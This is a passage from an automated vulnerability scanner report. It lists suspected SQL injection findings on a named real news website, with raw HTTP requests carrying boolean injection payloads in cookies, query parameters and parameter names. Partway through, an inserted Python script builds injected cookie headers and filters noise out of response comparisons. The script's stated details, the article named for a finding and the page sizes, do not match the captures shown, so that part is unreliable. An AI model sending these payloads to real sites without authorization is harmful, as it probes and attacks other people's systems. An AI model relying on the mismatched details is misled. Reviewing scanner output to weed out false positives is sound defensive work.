GET /news/ci_16791147?source=rss&nclick_check=1 HTTP/1.1
Host: www.contracostatimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UserType=Browser; currBrandCheck=mngicctimes; s_cc=true; SOURCE=top-hp-promo-box-photo; u=COOKIE_NAME%3Du%3BuserIdChange%3Dtrue%3BuserId%3DZ4PETROM1AFIICUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dtrue%3BfVisit%3Dtrue%3BvType%3D1%3BlVisit%3D1291762325530%3BcVisit%3D1291762325530%3BinitRegType%3DVoluntary%3B; JSESSIONID=Z4PETROM1AFIICUUCBWCFFI; EMETA_COOKIE_CHECK_MNGI=117543039%20or%201%3d1--%20; s_sq=%5B%5BB%5D%5D; UserID=Z4PETROM1AFIICUUCBWCFFI; fPage=true; EMETA_NCLICK_MNGI=2;

Response 1

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Vary: Accept-encoding
Expires: Wed, 08 Dec 2010 01:52:04 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 08 Dec 2010 01:52:04 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: EMETA_NCLICK_MNGI=3; path=/; expires=Thursday, 09-Dec-2010 01:52:03 GMT
Set-Cookie: JSESSIONID=5XBLXOMTXTN5GCUUCBWCFFI; path=/
Content-Type: text/html;charset=UTF-8
Content-Length: 73336

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='In recent years, home brewing has gone from a one-time illegal practice to a hobby and business that has inspired clubs, organizations and competitions such as the one at the Beer Revolution. '><meta name="keywords" content="news newsmainfront breaking crime accident police development city council government strike court disaster environment breaking news"/><title>Home brewing on the rise in the Bay Area - ContraCostaTimes.com</title><meta name="verify-v1" content="9dwSr9Yve34JXLjszyjsdM95FWP13xu2vUbiVSesr2I=" />
<meta name="msvalidate.01" content="9DAB14005AD5A9FFA4CA0EF58CC794BA" />

<META name="y_key" content="05f2f4daeedbbc05" />
<script language="JavaScript">
document.write('<link rel="shortcut icon" href="http://extras.mnginteractive.com/live/media/favIcon/contra/favicon.ico" type="image/x-icon">');
document.write('<link rel="icon" href="http://extras.mnginteractive.com/live/media/favIcon/contra/favicon.ico" type="image/x-icon">');
</script>

<meta name="verify-v1" content="5tjAz4i10RSTLPe7KO1DheJAj1gF3Exe2k8P/btAy38=" />

<script src="http://extras.mnginteractive.com/live/js/Brightcove/ContraCosta/MobileCompatibility.js"></script>

<Script language="JavaScript">
   var CM8Server = "q1.checkm8.com";
   var CM8Cat = "contracostatimes.News.Front";
   var CM8Profile="";
   </script>
<SCRIPT language="JavaScript" src="http://q1digital.checkm8.com/adam/cm8adam_1_call.js"></SCRIPT><!-- get profile info --><!-- user not logged in (javascript) --><script language="JavaScript" type="text/javascript">
               MNGiRegistrationLoginStatus = "out";
               MNGiRegistrationUserName = "";
               MNGiRegistrationEmail = "";
           </script><!-- end get profile info --><script language
...[SNIP]...

Request 2

GET /news/ci_16791147?source=rss&nclick_check=1 HTTP/1.1
Host: www.contracostatimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UserType=Browser; currBrandCheck=mngicctimes; s_cc=true; SOURCE=top-hp-promo-box-photo; u=COOKIE_NAME%3Du%3BuserIdChange%3Dtrue%3BuserId%3DZ4PETROM1AFIICUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dtrue%3BfVisit%3Dtrue%3BvType%3D1%3BlVisit%3D1291762325530%3BcVisit%3D1291762325530%3BinitRegType%3DVoluntary%3B; JSESSIONID=Z4PETROM1AFIICUUCBWCFFI; EMETA_COOKIE_CHECK_MNGI=117543039%20or%201%3d2--%20; s_sq=%5B%5BB%5D%5D; UserID=Z4PETROM1AFIICUUCBWCFFI; fPage=true; EMETA_NCLICK_MNGI=2;

Response 2

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Vary: Accept-encoding
Expires: Wed, 08 Dec 2010 01:52:04 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 08 Dec 2010 01:52:04 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: JSESSIONID=GTJMUZKYMUT0ACUUCBWCFFI; path=/
Content-Type: text/html;charset=UTF-8
Content-Length: 73336

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='In recent years, home brewing has gone from a one-time illegal practice to a hobby and business that has inspired clubs, organizations and competitions such as the one at the Beer Revolution. '><meta name="keywords" content="news newsmainfront breaking crime accident police development city council government strike court disaster environment breaking news"/><title>Home brewing on the rise in the Bay Area - ContraCostaTimes.com</title><meta name="verify-v1" content="9dwSr9Yve34JXLjszyjsdM95FWP13xu2vUbiVSesr2I=" />
<meta name="msvalidate.01" content="9DAB14005AD5A9FFA4CA0EF58CC794BA" />

<META name="y_key" content="05f2f4daeedbbc05" />
<script language="JavaScript">
document.write('<link rel="shortcut icon" href="http://extras.mnginteractive.com/live/media/favIcon/contra/favicon.ico" type="image/x-icon">');
document.write('<link rel="icon" href="http://extras.mnginteractive.com/live/media/favIcon/contra/favicon.ico" type="image/x-icon">');
</script>

<meta name="verify-v1" content="5tjAz4i10RSTLPe7KO1DheJAj1gF3Exe2k8P/btAy38=" />

<script src="http://extras.mnginteractive.com/live/js/Brightcove/ContraCosta/MobileCompatibility.js"></script>

<Script language="JavaScript">
   var CM8Server = "q1.checkm8.com";
   var CM8Cat = "contracostatimes.News.Front";
   var CM8Profile="";
   </script>
<SCRIPT language="JavaScript" src="http://q1digital.checkm8.com/adam/cm8adam_1_call.js"></SCRIPT><!-- get profile info --><!-- user not logged in (javascript) --><script language="JavaScript" type="text/javascript">
               MNGiRegistrationLoginStatus = "out";
               MNGiRegistrationUserName = "";
               MNGiRegistrationEmail = "";
           </script><!-- end get profile info --><script language="JavaScript" type="text/javascript">
   MNGiRegistrationLoginUrl = "https://secure.pas
...[SNIP]...
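The findings 1.139 to 1.143 all rest on the same test: send a true and a false boolean condition in one input and compare the two responses. The pairs recorded above differ only in timestamps and Set-Cookie headers, which is exactly the noise a naive comparison trips over. The following script is an added example, not part of the scanner report or of the site's code: it builds the injected Cookie header the way the scanner did, then re-compares a response pair after discounting the per-request fields seen on this page. The sample responses are constructed; their header values (dates, JSESSIONID values, the EMETA_NCLICK_MNGI cookie) are copied from the 1.139 pair, while the short bodies stand in for the 61721-byte article pages. The "article not found" body used for the genuine-hit case is an assumption about what a real boolean-blind difference might look like.

```python
# Added example (not part of the scanner report): re-check a difference-based
# SQL injection finding by discounting the per-request noise visible in the
# recorded pairs, and build the injected Cookie header the way the scanner did.
from typing import Dict, List, Tuple

# Header fields that changed between every Request 1 / Request 2 pair on this
# page whether or not the injected condition was true: timestamps, the fresh
# JSESSIONID issued on each response, and the EMETA_NCLICK_MNGI click counter.
VOLATILE_HEADERS = {"date", "expires", "set-cookie"}


def inject_into_cookie(cookie_header: str, name: str, payload: str) -> str:
    """Append payload to one cookie's value, leaving the other cookies intact
    (currBrandCheck=mngicctimes becomes currBrandCheck=mngicctimes<payload>)."""
    out = []
    for item in cookie_header.split(";"):
        item = item.strip()
        if not item:
            continue
        key, _, value = item.partition("=")
        if key == name:
            item = f"{key}={value}{payload}"
        out.append(item)
    return "; ".join(out)


def build_response(date: str, set_cookies: List[str], body: str) -> str:
    """Assemble a raw HTTP/1.1 response with the header shape the site returned."""
    lines = [
        "HTTP/1.1 200 OK",
        "Server: Apache/2.0.52 (Red Hat)",
        f"Expires: {date}",
        "Cache-Control: max-age=0, no-cache, no-store",
        f"Date: {date}",
        "Connection: close",
    ]
    lines += [f"Set-Cookie: {c}" for c in set_cookies]
    lines += ["Content-Type: text/html;charset=UTF-8",
              f"Content-Length: {len(body.encode())}"]
    return "\r\n".join(lines) + "\r\n\r\n" + body


def parse_response(raw: str) -> Tuple[str, Dict[str, List[str]], str]:
    """Split a raw response into status line, multi-valued headers and body."""
    head, _, body = raw.partition("\r\n\r\n")
    status, *header_lines = head.split("\r\n")
    headers: Dict[str, List[str]] = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers.setdefault(name.strip().lower(), []).append(value.strip())
    return status, headers, body


def raw_differences(raw_a: str, raw_b: str) -> List[str]:
    """Every field that differs, which is all a naive comparison looks at."""
    status_a, hdr_a, body_a = parse_response(raw_a)
    status_b, hdr_b, body_b = parse_response(raw_b)
    diffs = ["status"] if status_a != status_b else []
    diffs += [n for n in sorted(set(hdr_a) | set(hdr_b)) if hdr_a.get(n) != hdr_b.get(n)]
    if body_a != body_b:
        diffs.append("body")
    return diffs


def verdict(raw_true: str, raw_false: str) -> Tuple[str, List[str]]:
    """'supported' if something other than per-request noise differs between the
    true-condition and false-condition responses, otherwise 'noise only'."""
    diffs = raw_differences(raw_true, raw_false)
    signal = [d for d in diffs if d not in VOLATILE_HEADERS]
    return ("supported", signal) if signal else ("noise only", diffs)


# Constructed samples modelled on the 1.139 pair: same article body on both
# sides, differing only in timestamps and Set-Cookie, exactly as recorded.
ARTICLE = "<html><head><title>Owners of El Balazo restaurant chain charged - ContraCostaTimes.com</title></head><body>...</body></html>"
RESP_TRUE = build_response("Wed, 08 Dec 2010 01:47:01 GMT",
                           ["EMETA_NCLICK_MNGI=3; path=/; expires=Thursday, 09-Dec-2010 01:47:01 GMT",
                            "JSESSIONID=HOVL5CAX1C3Z2CUUCBWCFFI; path=/"], ARTICLE)
RESP_FALSE = build_response("Wed, 08 Dec 2010 01:47:03 GMT",
                            ["JSESSIONID=TGAIYGZP4PP1ACUUCBWCFFI; path=/"], ARTICLE)
# Constructed (assumed) false-condition response of the kind a genuine
# boolean-blind hit produces: the page content changes, not just the headers.
RESP_FALSE_REAL = build_response("Wed, 08 Dec 2010 01:47:03 GMT",
                                 ["JSESSIONID=TGAIYGZP4PP1ACUUCBWCFFI; path=/"],
                                 "<html><head><title>Article not found - ContraCostaTimes.com</title></head><body></body></html>")

if __name__ == "__main__":
    cookie = "UserType=Browser; currBrandCheck=mngicctimes; s_cc=true"
    print(inject_into_cookie(cookie, "currBrandCheck", "'%20and%201%3d1--%20"))
    print(verdict(RESP_TRUE, RESP_FALSE))       # ('noise only', ['date', 'expires', 'set-cookie'])
    print(verdict(RESP_TRUE, RESP_FALSE_REAL))  # ('supported', ['content-length', 'body'])
```

Run against the recorded pairs, the first comparison comes back "noise only", which is the verdict a reviewer should reach for 1.139 through 1.142 from the captures alone; the second shows what a difference worth escalating looks like, where the body (and with it Content-Length) tracks the injected condition. Repeating the true/false pair several times and alternating their order is the cheap way to separate timing and session noise from real signal.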

1.143. http://www.contracostatimes.com/news/ci_16791147 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.contracostatimes.com
Path:   /news/ci_16791147

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 23783182%20or%201%3d1--%20 and 23783182%20or%201%3d2--%20 were each used to form the name of an extra query-string parameter (requested as ?123783182%20or%201%3d1--%20=1 and ?123783182%20or%201%3d2--%20=1), so here the injected text is URL-decoded by the server before the application sees it. The scanner judged the two responses to be different and infers from that difference that the parameter name reaches a SQL query unescaped, which would require the application to build SQL from parameter names it does not recognise.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. Response 1 below is 200 OK with Content-Length 73333; the capture of Response 2 is cut off before its body, so the pair cannot be compared from this page alone. Manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /news/ci_16791147?123783182%20or%201%3d1--%20=1 HTTP/1.1
Host: www.contracostatimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UserType=Browser; currBrandCheck=mngicctimes; s_cc=true; SOURCE=top-hp-promo-box-photo; u=COOKIE_NAME%3Du%3BuserIdChange%3Dtrue%3BuserId%3DZ4PETROM1AFIICUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dtrue%3BfVisit%3Dtrue%3BvType%3D1%3BlVisit%3D1291762325530%3BcVisit%3D1291762325530%3BinitRegType%3DVoluntary%3B; JSESSIONID=Z4PETROM1AFIICUUCBWCFFI; EMETA_COOKIE_CHECK_MNGI=1; s_sq=%5B%5BB%5D%5D; UserID=Z4PETROM1AFIICUUCBWCFFI; fPage=true; EMETA_NCLICK_MNGI=2;

Response 1

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Vary: Accept-encoding
Expires: Wed, 08 Dec 2010 01:52:07 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 08 Dec 2010 01:52:07 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: EMETA_NCLICK_MNGI=3; path=/; expires=Thursday, 09-Dec-2010 01:52:07 GMT
Set-Cookie: JSESSIONID=0HUMVUTRKV3CGCUUCBWCFFI; path=/
Content-Type: text/html;charset=UTF-8
Content-Length: 73333

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='In recent years, home brewing has gone from a one-time illegal practice to a hobby and business that has inspired clubs, organizations and competitions such as the one at the Beer Revolution. '><meta name="keywords" content="news newsmainfront breaking crime accident police development city council government strike court disaster environment breaking news"/><title>Home brewing on the rise in the Bay Area - ContraCostaTimes.com</title><meta name="verify-v1" content="9dwSr9Yve34JXLjszyjsdM95FWP13xu2vUbiVSesr2I=" />
<meta name="msvalidate.01" content="9DAB14005AD5A9FFA4CA0EF58CC794BA" />

<META name="y_key" content="05f2f4daeedbbc05" />
<script language="JavaScript">
document.write('<link rel="shortcut icon" href="http://extras.mnginteractive.com/live/media/favIcon/contra/favicon.ico" type="image/x-icon">');
document.write('<link rel="icon" href="http://extras.mnginteractive.com/live/media/favIcon/contra/favicon.ico" type="image/x-icon">');
</script>

<meta name="verify-v1" content="5tjAz4i10RSTLPe7KO1DheJAj1gF3Exe2k8P/btAy38=" />

<script src="http://extras.mnginteractive.com/live/js/Brightcove/ContraCosta/MobileCompatibility.js"></script>

<Script language="JavaScript">
   var CM8Server = "q1.checkm8.com";
   var CM8Cat = "contracostatimes.News.Front";
   var CM8Profile="";
   </script>
<SCRIPT language="JavaScript" src="http://q1digital.checkm8.com/adam/cm8adam_1_call.js"></SCRIPT><!-- get profile info --><!-- user not logged in (javascript) --><script language="JavaScript" type="text/javascript">
               MNGiRegistrationLoginStatus = "out";
               MNGiRegistrationUserName = "";
               MNGiRegistrationEmail = "";
           </script><!-- end get profile info --><script language
...[SNIP]...

Request 2

GET /news/ci_16791147?123783182%20or%201%3d2--%20=1 HTTP/1.1
Host: www.contracostatimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UserType=Browser; currBrandCheck=mngicctimes; s_cc=true; SOURCE=top-hp-promo-box-photo; u=COOKIE_NAME%3Du%3BuserIdChange%3Dtrue%3BuserId%3DZ4PETROM1AFIICUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dtrue%3BfVisit%3Dtrue%3BvType%3D1%3BlVisit%3D1291762325530%3BcVisit%3D1291762325530%3BinitRegType%3DVoluntary%3B; JSESSIONID=Z4PETROM1AFIICUUCBWCFFI; EMETA_COOKIE_CHECK_MNGI=1; s_sq=%5B%5BB%5D%5D; UserID=Z4PETROM1AFIICUUCBWCFFI; fPage=true; EMETA_NCLICK_MNGI=2;

Response 2

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Vary: Accept-encoding
Expires: Wed, 08 Dec 2010 01:52:07 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 08 Dec 2010 01:52:07 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: JSESSIONID=CB1MEKXOFWCDYCUUCBWCFFI; path=/
Content-Type: text/html;charset=UTF-8
Content-Length: 73333

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='In recent years, home brewing has gone from a one-time illegal practice to a hobby and business that has inspired clubs, organizations and competitions such as the one at the Beer Revolution. '><meta name="keywords" content="news newsmainfront breaking crime accident police development city council government strike court disaster environment breaking news"/><title>Home brewing on the rise in the Bay Area - ContraCostaTimes.com</title><meta name="verify-v1" content="9dwSr9Yve34JXLjszyjsdM95FWP13xu2vUbiVSesr2I=" />
<meta name="msvalidate.01" content="9DAB14005AD5A9FFA4CA0EF58CC794BA" />

<META name="y_key" content="05f2f4daeedbbc05" />
<script language="JavaScript">
document.write('<link rel="shortcut icon" href="http://extras.mnginteractive.com/live/media/favIcon/contra/favicon.ico" type="image/x-icon">');
document.write('<link rel="icon" href="http://extras.mnginteractive.com/live/media/favIcon/contra/favicon.ico" type="image/x-icon">');
</script>

<meta name="verify-v1" content="5tjAz4i10RSTLPe7KO1DheJAj1gF3Exe2k8P/btAy38=" />

<script src="http://extras.mnginteractive.com/live/js/Brightcove/ContraCosta/MobileCompatibility.js"></script>

<Script language="JavaScript">
   var CM8Server = "q1.checkm8.com";
   var CM8Cat = "contracostatimes.News.Front";
   var CM8Profile="";
   </script>
<SCRIPT language="JavaScript" src="http://q1digital.checkm8.com/adam/cm8adam_1_call.js"></SCRIPT><!-- get profile info --><!-- user not logged in (javascript) --><script language="JavaScript" type="text/javascript">
               MNGiRegistrationLoginStatus = "out";
               MNGiRegistrationUserName = "";
               MNGiRegistrationEmail = "";
           </script><!-- end get profile info --><script language="JavaScript" type="text/javascript">
   MNGiRegistrationLoginUrl = "https://secure.pas
...[SNIP]...

1.144. http://www.contracostatimes.com/news/ci_16792343 [nclick_check parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.contracostatimes.com
Path:   /news/ci_16792343

Issue detail

The nclick_check parameter appears to be vulnerable to SQL injection attacks. The payloads 33516214'%20or%201%3d1--%20 and 33516214'%20or%201%3d2--%20 were each submitted in the nclick_check parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /news/ci_16792343?source=rss&nclick_check=133516214'%20or%201%3d1--%20 HTTP/1.1
Host: www.contracostatimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UserType=Browser; currBrandCheck=mngicctimes; s_cc=true; SOURCE=top-hp-promo-box-photo; u=COOKIE_NAME%3Du%3BuserIdChange%3Dtrue%3BuserId%3DZ4PETROM1AFIICUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dtrue%3BfVisit%3Dtrue%3BvType%3D1%3BlVisit%3D1291762325530%3BcVisit%3D1291762325530%3BinitRegType%3DVoluntary%3B; JSESSIONID=Z4PETROM1AFIICUUCBWCFFI; EMETA_COOKIE_CHECK_MNGI=1; s_sq=%5B%5BB%5D%5D; UserID=Z4PETROM1AFIICUUCBWCFFI; fPage=true; EMETA_NCLICK_MNGI=2;

Response 1

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Vary: Accept-encoding
Expires: Wed, 08 Dec 2010 01:50:12 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 08 Dec 2010 01:50:12 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: EMETA_NCLICK_MNGI=3; path=/; expires=Thursday, 09-Dec-2010 01:50:12 GMT
Set-Cookie: JSESSIONID=H3ZBRASCQDQBMCUUCBWCFFI; path=/
Content-Type: text/html;charset=UTF-8
Content-Length: 66698

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='The owners of the El Balazo restaurant chain have been charged with 20 counts of tax evasion, conspiracy and employing more than 60 illegal immigrants at their restaurants.'><meta name="keywords" content="news newsmainfront breaking crime accident police development city council government strike court disaster environment breaking news"/><title>Owners of El Balazo restaurant chain charged with tax fraud and hiring illegal immigrants - ContraCostaTimes.com</title><meta name="verify-v1" content="9dwSr9Yve34JXLjszyjsdM95FWP13xu2vUbiVSesr2I=" />
<meta name="msvalidate.01" content="9DAB14005AD5A9FFA4CA0EF58CC794BA" />

<META name="y_key" content="05f2f4daeedbbc05" />
<script language="JavaScript">
document.write('<link rel="shortcut icon" href="http://extras.mnginteractive.com/live/media/favIcon/contra/favicon.ico" type="image/x-icon">');
document.write('<link rel="icon" href="http://extras.mnginteractive.com/live/media/favIcon/contra/favicon.ico" type="image/x-icon">');
</script>

<meta name="verify-v1" content="5tjAz4i10RSTLPe7KO1DheJAj1gF3Exe2k8P/btAy38=" />

<script src="http://extras.mnginteractive.com/live/js/Brightcove/ContraCosta/MobileCompatibility.js"></script>

<Script language="JavaScript">
   var CM8Server = "q1.checkm8.com";
   var CM8Cat = "contracostatimes.News.Front";
   var CM8Profile="";
   </script>
<SCRIPT language="JavaScript" src="http://q1digital.checkm8.com/adam/cm8adam_1_call.js"></SCRIPT><!-- get profile info --><!-- user not logged in (javascript) --><script language="JavaScript" type="text/javascript">
               MNGiRegistrationLoginStatus = "out";
               MNGiRegistrationUserName = "";
               MNGiRegistrationEmail = "";
           </script><!-- end get prof
...[SNIP]...

Request 2

GET /news/ci_16792343?source=rss&nclick_check=133516214'%20or%201%3d2--%20 HTTP/1.1
Host: www.contracostatimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UserType=Browser; currBrandCheck=mngicctimes; s_cc=true; SOURCE=top-hp-promo-box-photo; u=COOKIE_NAME%3Du%3BuserIdChange%3Dtrue%3BuserId%3DZ4PETROM1AFIICUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dtrue%3BfVisit%3Dtrue%3BvType%3D1%3BlVisit%3D1291762325530%3BcVisit%3D1291762325530%3BinitRegType%3DVoluntary%3B; JSESSIONID=Z4PETROM1AFIICUUCBWCFFI; EMETA_COOKIE_CHECK_MNGI=1; s_sq=%5B%5BB%5D%5D; UserID=Z4PETROM1AFIICUUCBWCFFI; fPage=true; EMETA_NCLICK_MNGI=2;

Response 2

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Vary: Accept-encoding
Expires: Wed, 08 Dec 2010 01:50:15 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 08 Dec 2010 01:50:15 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: JSESSIONID=L4TSTKXBEQ2KICUUCBWCFFI; path=/
Content-Type: text/html;charset=UTF-8
Content-Length: 66698

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='The owners of the El Balazo restaurant chain have been charged with 20 counts of tax evasion, conspiracy and employing more than 60 illegal immigrants at their restaurants.'><meta name="keywords" content="news newsmainfront breaking crime accident police development city council government strike court disaster environment breaking news"/><title>Owners of El Balazo restaurant chain charged with tax fraud and hiring illegal immigrants - ContraCostaTimes.com</title><meta name="verify-v1" content="9dwSr9Yve34JXLjszyjsdM95FWP13xu2vUbiVSesr2I=" />
<meta name="msvalidate.01" content="9DAB14005AD5A9FFA4CA0EF58CC794BA" />

<META name="y_key" content="05f2f4daeedbbc05" />
<script language="JavaScript">
document.write('<link rel="shortcut icon" href="http://extras.mnginteractive.com/live/media/favIcon/contra/favicon.ico" type="image/x-icon">');
document.write('<link rel="icon" href="http://extras.mnginteractive.com/live/media/favIcon/contra/favicon.ico" type="image/x-icon">');
</script>

<meta name="verify-v1" content="5tjAz4i10RSTLPe7KO1DheJAj1gF3Exe2k8P/btAy38=" />

<script src="http://extras.mnginteractive.com/live/js/Brightcove/ContraCosta/MobileCompatibility.js"></script>

<Script language="JavaScript">
   var CM8Server = "q1.checkm8.com";
   var CM8Cat = "contracostatimes.News.Front";
   var CM8Profile="";
   </script>
<SCRIPT language="JavaScript" src="http://q1digital.checkm8.com/adam/cm8adam_1_call.js"></SCRIPT><!-- get profile info --><!-- user not logged in (javascript) --><script language="JavaScript" type="text/javascript">
               MNGiRegistrationLoginStatus = "out";
               MNGiRegistrationUserName = "";
               MNGiRegistrationEmail = "";
           </script><!-- end get profile info --><script language="JavaScript" type="text/javascript">
   MNGiRegistrationLo
...[SNIP]...

1.145. http://www.contracostatimes.com/samesexmarriage/ci_16792108 [source parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.contracostatimes.com
Path:   /samesexmarriage/ci_16792108

Issue detail

The source parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the source parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /samesexmarriage/ci_16792108?source=most_viewed'%20and%201%3d1--%20 HTTP/1.1
Host: www.contracostatimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UserType=Browser; currBrandCheck=mngicctimes; s_cc=true; SOURCE=top-hp-promo-box-photo; u=COOKIE_NAME%3Du%3BuserIdChange%3Dtrue%3BuserId%3DZ4PETROM1AFIICUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dtrue%3BfVisit%3Dtrue%3BvType%3D1%3BlVisit%3D1291762325530%3BcVisit%3D1291762325530%3BinitRegType%3DVoluntary%3B; JSESSIONID=Z4PETROM1AFIICUUCBWCFFI; EMETA_COOKIE_CHECK_MNGI=1; s_sq=%5B%5BB%5D%5D; UserID=Z4PETROM1AFIICUUCBWCFFI; fPage=true; EMETA_NCLICK_MNGI=2;

Response 1

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Vary: Accept-encoding
Expires: Wed, 08 Dec 2010 01:46:17 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 08 Dec 2010 01:46:17 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: EMETA_NCLICK_MNGI=3; path=/; expires=Thursday, 09-Dec-2010 01:46:17 GMT
Set-Cookie: JSESSIONID=BHJYSCE0GIRNGCUUCBWCFFI; path=/
Content-Type: text/html;charset=UTF-8
Content-Length: 74247

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='In more than two hours of legal sparring, lawyers on both sides of the battle over the state&#27;s ban on same-sex marriage were at various times pressed by each of the three 9th U.S. Circuit of Appeals judges hearing the challenge to Proposition 8.'><meta name="keywords" content="samesex marriage gay supreme court alameda contra costa county clerk"/><title>Appeals Court judges appear inclined to support gay marriage - ContraCostaTimes.com</title><meta name="verify-v1" content="9dwSr9Yve34JXLjszyjsdM95FWP13xu2vUbiVSesr2I=" />
<meta name="msvalidate.01" content="9DAB14005AD5A9FFA4CA0EF58CC794BA" />

<META name="y_key" content="05f2f4daeedbbc05" />
<script language="JavaScript">
document.write('<link rel="shortcut icon" href="http://extras.mnginteractive.com/live/media/favIcon/contra/favicon.ico" type="image/x-icon">');
document.write('<link rel="icon" href="http://extras.mnginteractive.com/live/media/favIcon/contra/favicon.ico" type="image/x-icon">');
</script>

<meta name="verify-v1" content="5tjAz4i10RSTLPe7KO1DheJAj1gF3Exe2k8P/btAy38=" />

<script src="http://extras.mnginteractive.com/live/js/Brightcove/ContraCosta/MobileCompatibility.js"></script>

<!-- get profile info --><!-- user not logged in (javascript) --><script language="JavaScript" type="text/javascript">
               MNGiRegistrationLoginStatus = "out";
               MNGiRegistrationUserName = "";
               MNGiRegistrationEmail = "";
           </script><!-- end get profile info --><script language="JavaScript" type="text/javascript">
   MNGiRegistrationLoginUrl = "https://secure.passport.mnginteractive.com/mngi/servletDispatch/ErightsPassportServlet.dyn";
   MNGiRegistrationUrl = "https://secure.www.contracostatimes.com";
   MN
...[SNIP]...

Request 2

GET /samesexmarriage/ci_16792108?source=most_viewed'%20and%201%3d2--%20 HTTP/1.1
Host: www.contracostatimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
